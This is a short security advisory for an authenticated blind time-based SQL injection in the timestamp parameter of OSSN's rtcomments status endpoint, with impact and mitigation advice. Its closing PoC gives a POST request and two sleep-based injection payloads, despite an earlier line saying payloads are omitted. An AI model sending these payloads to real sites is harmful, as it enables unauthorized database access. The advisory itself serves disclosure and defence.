## https://sploitus.com/exploit?id=CF7576AB-53A8-5D0A-9686-21E40CA8F710
# CVE-2025-63585
**Blind Time-Based SQL Injection in /action/rtcomments/status (parameter: timestamp)**
A blind, time-based SQL injection vulnerability was found in the timestamp parameter of the /action/rtcomments/status endpoint. An authenticated attacker who can supply this parameter may be able to execute arbitrary SQL queries, potentially exposing or modifying sensitive data.
**Impact:** data disclosure, data modification, privilege escalation,Potential Denial of Service (DoS) through time-delay queries, (depending on DB permissions).
**Mitigation:** Upgrade OSSN to version 8.9 or later. Additionally, ensure the application uses parameterized queries/prepared statements for all database access, validate timestamp input strictly (accept only expected numeric or ISO formats), enforce least-privilege for the DB account, and enable query timeouts and logging.
**Notes:** Exploit payloads are intentionally omitted for safety.
**github:** https://github.com/opensource-socialnetwork/opensource-socialnetwork/issues/2503
**PoC**
Send request with method POST '/action/rtcomments/status?guid=18&type=post&ossn_ts=1759741100&ossn_token=c3901a321e755ea3e9956e79eb0fbc7e674f80665725774738b93324699c7c28'
Payload: timestamp=(select*from(select(sleep(10)))a)
Payload: timestamp=(select*from(select(sleep(30)))a)